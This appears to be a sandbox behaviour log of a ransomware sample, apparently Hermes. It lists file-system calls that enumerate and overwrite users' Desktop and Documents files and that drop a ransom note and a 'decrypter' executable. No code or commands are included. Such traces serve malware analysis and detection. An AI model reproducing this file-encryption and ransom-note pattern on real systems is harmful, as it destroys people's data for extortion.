Create C:\Users\FD1HVy\Desktop\OZa1OvHSiPZtGYMnr.avi desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Desktop\RSUbGrWMOv90jjgcKmCA.jpg desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Desktop\RSUbGrWMOv90jjgcKmCA.jpg desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Desktop\uy _qJUK.mp3 desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Desktop\uy _qJUK.mp3 desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Desktop\Vmnx49O7kGj.png desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Desktop\Vmnx49O7kGj.png desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Desktop\kUVq_ b-BGEv YRT\fhdgh_AfpkHHBB9_QqtI\K6Z4SfIpaB.mkv desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Desktop\kUVq_ b-BGEv YRT\fhdgh_AfpkHHBB9_QqtI\K6Z4SfIpaB.mkv desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Desktop\kUVq_ b-BGEv YRT\fhdgh_AfpkHHBB9_QqtI\TfNW1f m7CX1OiM.xls desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Desktop\kUVq_ b-BGEv YRT\fhdgh_AfpkHHBB9_QqtI\TfNW1f m7CX1OiM.xls desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Desktop\kUVq_ b-BGEv YRT\fhdgh_AfpkHHBB9_QqtI\Yzb93Q82DMI82wO\4Mx7zT82zOjgkV9spUg.png desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Desktop\kUVq_ b-BGEv YRT\fhdgh_AfpkHHBB9_QqtI\Yzb93Q82DMI82wO\4Mx7zT82zOjgkV9spUg.png desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Desktop\kUVq_ b-BGEv YRT\fhdgh_AfpkHHBB9_QqtI\Yzb93Q82DMI82wO\nVeBdFzvpwwtXC.mp3 desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Desktop\kUVq_ b-BGEv YRT\fhdgh_AfpkHHBB9_QqtI\Yzb93Q82DMI82wO\nVeBdFzvpwwtXC.mp3 desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Desktop\kUVq_ b-BGEv YRT\fhdgh_AfpkHHBB9_QqtI\Yzb93Q82DMI82wO\teY6IrO7ujB.jpg desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Desktop\kUVq_ b-BGEv YRT\fhdgh_AfpkHHBB9_QqtI\Yzb93Q82DMI82wO\teY6IrO7ujB.jpg desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Documents\--8WWFRhf0b.pptx desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Documents\--8WWFRhf0b.pptx desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Documents\1v32WDK.pptx desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Documents\1v32WDK.pptx desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Documents\4z4 82v.xlsx desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Documents\4z4 82v.xlsx desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Documents\6jL9GY5.xlsx desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Documents\6jL9GY5.xlsx desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Documents\9dHCFyZ_.odt desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Documents\9dHCFyZ_.odt desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Documents\Am2R.docx desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Documents\Am2R.docx desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Documents\ayhyoBKV0xMLiy.docx desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Documents\ayhyoBKV0xMLiy.docx desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Documents\BZh3 QA3w.xlsx desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Documents\BZh3 QA3w.xlsx desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Documents\IDj9.docx desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Documents\IDj9.docx desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Documents\oK6_.pptx desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Documents\oK6_.pptx desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Documents\pFdPoLW.docx desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Documents\pFdPoLW.docx desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Documents\uZFTfGR0J-cG.pptx desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Documents\uZFTfGR0J-cG.pptx desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Documents\v2OWp_Gc8AHT3d4nGyy.docx desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Documents\v2OWp_Gc8AHT3d4nGyy.docx desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Documents\V_Zl34r.xlsx desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Documents\V_Zl34r.xlsx desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Documents\X7xxXdVkKAI.pptx desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Documents\X7xxXdVkKAI.pptx desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Documents\xpmGmPcch3uV.xlsx desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Documents\xpmGmPcch3uV.xlsx desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\5hwK.doc desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\5hwK.doc desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\NeCh.csv desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\NeCh.csv desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\RwxQrbJr.rtf desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\RwxQrbJr.rtf desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\77bIp480yHDf0\47y8mp0s.csv desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\77bIp480yHDf0\47y8mp0s.csv desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\77bIp480yHDf0\Hi Fm0SkJi.pdf desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\77bIp480yHDf0\Hi Fm0SkJi.pdf desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\77bIp480yHDf0\pjQnM18Yq7so0m2EOvAa.csv desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\77bIp480yHDf0\pjQnM18Yq7so0m2EOvAa.csv desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\HhXhtU9gOiLGZ\6Py75SwYl1UPRzmW_N.csv desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\HhXhtU9gOiLGZ\6Py75SwYl1UPRzmW_N.csv desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\HhXhtU9gOiLGZ\hy UYGYQM9MBJYSeMTx.ppt desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\HhXhtU9gOiLGZ\hy UYGYQM9MBJYSeMTx.ppt desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\HhXhtU9gOiLGZ\pFzSit0y49o.odt desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\HhXhtU9gOiLGZ\pFzSit0y49o.odt desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\HhXhtU9gOiLGZ\So7sQ6gpKdfTrbp.ppt desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\HhXhtU9gOiLGZ\So7sQ6gpKdfTrbp.ppt desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\PVOgT\43Z39pBBrj.pptx desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\PVOgT\43Z39pBBrj.pptx desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\PVOgT\jDPo.xls desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\PVOgT\jDPo.xls desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\PVOgT\kryOh-FNUXNCWUA.xls desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\PVOgT\kryOh-FNUXNCWUA.xls desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\PVOgT\oKefxkUyIL.xls desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\PVOgT\oKefxkUyIL.xls desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\PVOgT\yOtj RSlDnhyJi.xlsx desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\PVOgT\yOtj RSlDnhyJi.xlsx desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Documents\My Shapes\_private\folder.ico desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Documents\My Shapes\_private\folder.ico desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\FD1HVy\Desktop\HOW TO DECRYPT FILES.txt desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\FD1HVy\ransom.jpg desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\FD1HVy\Hermes-decrypter-new.exe desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\FD1HVy\Desktop\Hermes-decrypter-new.exe desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
Create Directory C:\FD1HVy - True 1
Fn
Create Directory C:\FD1HVy\Systems - True 1
Fn
Get Info C:\Windows\Microsoft.NET\Framework\v4.0.30319\clrjit.dll type = file_attributes True 1
Fn
Get Info C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config type = file_attributes True 2
Fn
Get Info C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config type = file_type True 2
Fn
Get Info C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config type = size, size_out = 0 True 1
Fn
Get Info C:\Users\FD1HVy\Desktop\Hermes.exe.config type = file_attributes False 3
Fn
Get Info C:\FD1HVy\Systems type = file_attributes False 3
Fn
Get Info C:\FD1HVy type = file_attributes False 1
Fn
Get Info C:\Users\FD1HVy\Desktop\Hermes.exe type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\Desktop\-t3hSggSt8.csv type = file_type True 2
Fn
Get Info C:\Users\FD1HVy\Desktop\-t3hSggSt8.csv type = size, size_out = 0 True 1
Fn
Get Info C:\Windows\Microsoft.NET\Framework\v4.0.30319\config\machine.config type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\Desktop\HOW TO DECRYPT FILES.txt.Marozka type = file_attributes False 51
Fn
Get Info C:\Users\FD1HVy\Desktop\-t3hSggSt8.csv type = file_type True 2
Fn
Get Info C:\Users\FD1HVy\Desktop\-t3hSggSt8.csv type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\Desktop\-wiWbBcmoqutvw1S.odt type = file_type True 2
Fn
Get Info C:\Users\FD1HVy\Desktop\-wiWbBcmoqutvw1S.odt type = size, size_out = 0 True 1
Fn
Get Info C:\Users\FD1HVy\Desktop\-wiWbBcmoqutvw1S.odt type = file_type True 2
Fn
Get Info C:\Users\FD1HVy\Desktop\-wiWbBcmoqutvw1S.odt type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\Desktop\0YuVxzeY9-b4MF.avi type = file_type True 4
Fn
Get Info C:\Users\FD1HVy\Desktop\0YuVxzeY9-b4MF.avi type = size, size_out = 0 True 1
Fn
Get Info C:\Users\FD1HVy\Desktop\0YuVxzeY9-b4MF.avi type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\Desktop\dudTlSq3.mp3 type = file_type True 4
Fn
Get Info C:\Users\FD1HVy\Desktop\dudTlSq3.mp3 type = size, size_out = 0 True 1
Fn
Get Info C:\Users\FD1HVy\Desktop\dudTlSq3.mp3 type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\Desktop\du_y8ZA.bmp type = file_type True 4
Fn
Get Info C:\Users\FD1HVy\Desktop\du_y8ZA.bmp type = size, size_out = 0 True 1
Fn
Get Info C:\Users\FD1HVy\Desktop\du_y8ZA.bmp type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\Desktop\hIJHv_tpsSRLGQkXt1.mkv type = file_type True 4
Fn
Get Info C:\Users\FD1HVy\Desktop\hIJHv_tpsSRLGQkXt1.mkv type = size, size_out = 0 True 1
Fn
Get Info C:\Users\FD1HVy\Desktop\hIJHv_tpsSRLGQkXt1.mkv type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\Desktop\kXyvY.bmp type = file_type True 4
Fn
Get Info C:\Users\FD1HVy\Desktop\kXyvY.bmp type = size, size_out = 0 True 1
Fn
Get Info C:\Users\FD1HVy\Desktop\kXyvY.bmp type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\Desktop\ljwNeYj.avi type = file_type True 4
Fn
Get Info C:\Users\FD1HVy\Desktop\ljwNeYj.avi type = size, size_out = 0 True 1
Fn
Get Info C:\Users\FD1HVy\Desktop\ljwNeYj.avi type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\Desktop\mJmzsgIR.avi type = file_type True 4
Fn
Get Info C:\Users\FD1HVy\Desktop\mJmzsgIR.avi type = size, size_out = 0 True 1
Fn
Get Info C:\Users\FD1HVy\Desktop\mJmzsgIR.avi type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\Desktop\NwrDTZ.docx type = file_type True 4
Fn
Get Info C:\Users\FD1HVy\Desktop\NwrDTZ.docx type = size, size_out = 0 True 1
Fn
Get Info C:\Users\FD1HVy\Desktop\NwrDTZ.docx type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\Desktop\OZa1OvHSiPZtGYMnr.avi type = file_type True 4
Fn
Get Info C:\Users\FD1HVy\Desktop\OZa1OvHSiPZtGYMnr.avi type = size, size_out = 0 True 1
Fn
Get Info C:\Users\FD1HVy\Desktop\OZa1OvHSiPZtGYMnr.avi type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\Desktop\RSUbGrWMOv90jjgcKmCA.jpg type = file_type True 4
Fn
Get Info C:\Users\FD1HVy\Desktop\RSUbGrWMOv90jjgcKmCA.jpg type = size, size_out = 0 True 1
Fn
Get Info C:\Users\FD1HVy\Desktop\RSUbGrWMOv90jjgcKmCA.jpg type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\Desktop\uy _qJUK.mp3 type = file_type True 4
Fn
Get Info C:\Users\FD1HVy\Desktop\uy _qJUK.mp3 type = size, size_out = 0 True 1
Fn
Get Info C:\Users\FD1HVy\Desktop\uy _qJUK.mp3 type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\Desktop\Vmnx49O7kGj.png type = file_type True 4
Fn
Get Info C:\Users\FD1HVy\Desktop\Vmnx49O7kGj.png type = size, size_out = 0 True 1
Fn
Get Info C:\Users\FD1HVy\Desktop\Vmnx49O7kGj.png type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\Desktop\kUVq_ b-BGEv YRT\fhdgh_AfpkHHBB9_QqtI\K6Z4SfIpaB.mkv type = file_type True 4
Fn
Get Info C:\Users\FD1HVy\Desktop\kUVq_ b-BGEv YRT\fhdgh_AfpkHHBB9_QqtI\K6Z4SfIpaB.mkv type = size, size_out = 0 True 1
Fn
Get Info C:\Users\FD1HVy\Desktop\kUVq_ b-BGEv YRT\fhdgh_AfpkHHBB9_QqtI\K6Z4SfIpaB.mkv type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\Desktop\kUVq_ b-BGEv YRT\fhdgh_AfpkHHBB9_QqtI\TfNW1f m7CX1OiM.xls type = file_type True 4
Fn
Get Info C:\Users\FD1HVy\Desktop\kUVq_ b-BGEv YRT\fhdgh_AfpkHHBB9_QqtI\TfNW1f m7CX1OiM.xls type = size, size_out = 0 True 1
Fn
Get Info C:\Users\FD1HVy\Desktop\kUVq_ b-BGEv YRT\fhdgh_AfpkHHBB9_QqtI\TfNW1f m7CX1OiM.xls type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\Desktop\kUVq_ b-BGEv YRT\fhdgh_AfpkHHBB9_QqtI\Yzb93Q82DMI82wO\4Mx7zT82zOjgkV9spUg.png type = file_type True 4
Fn
Get Info C:\Users\FD1HVy\Desktop\kUVq_ b-BGEv YRT\fhdgh_AfpkHHBB9_QqtI\Yzb93Q82DMI82wO\4Mx7zT82zOjgkV9spUg.png type = size, size_out = 0 True 1
Fn
Get Info C:\Users\FD1HVy\Desktop\kUVq_ b-BGEv YRT\fhdgh_AfpkHHBB9_QqtI\Yzb93Q82DMI82wO\4Mx7zT82zOjgkV9spUg.png type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\Desktop\kUVq_ b-BGEv YRT\fhdgh_AfpkHHBB9_QqtI\Yzb93Q82DMI82wO\nVeBdFzvpwwtXC.mp3 type = file_type True 4
Fn
Get Info C:\Users\FD1HVy\Desktop\kUVq_ b-BGEv YRT\fhdgh_AfpkHHBB9_QqtI\Yzb93Q82DMI82wO\nVeBdFzvpwwtXC.mp3 type = size, size_out = 0 True 1
Fn
Get Info C:\Users\FD1HVy\Desktop\kUVq_ b-BGEv YRT\fhdgh_AfpkHHBB9_QqtI\Yzb93Q82DMI82wO\nVeBdFzvpwwtXC.mp3 type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\Desktop\kUVq_ b-BGEv YRT\fhdgh_AfpkHHBB9_QqtI\Yzb93Q82DMI82wO\teY6IrO7ujB.jpg type = file_type True 4
Fn
Get Info C:\Users\FD1HVy\Desktop\kUVq_ b-BGEv YRT\fhdgh_AfpkHHBB9_QqtI\Yzb93Q82DMI82wO\teY6IrO7ujB.jpg type = size, size_out = 0 True 1
Fn
Get Info C:\Users\FD1HVy\Desktop\kUVq_ b-BGEv YRT\fhdgh_AfpkHHBB9_QqtI\Yzb93Q82DMI82wO\teY6IrO7ujB.jpg type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\Documents\--8WWFRhf0b.pptx type = file_type True 4
Fn
Get Info C:\Users\FD1HVy\Documents\--8WWFRhf0b.pptx type = size, size_out = 0 True 1
Fn
Get Info C:\Users\FD1HVy\Documents\--8WWFRhf0b.pptx type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\Documents\1v32WDK.pptx type = file_type True 4
Fn
Get Info C:\Users\FD1HVy\Documents\1v32WDK.pptx type = size, size_out = 0 True 1
Fn
Get Info C:\Users\FD1HVy\Documents\1v32WDK.pptx type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\Documents\4z4 82v.xlsx type = file_type True 4
Fn
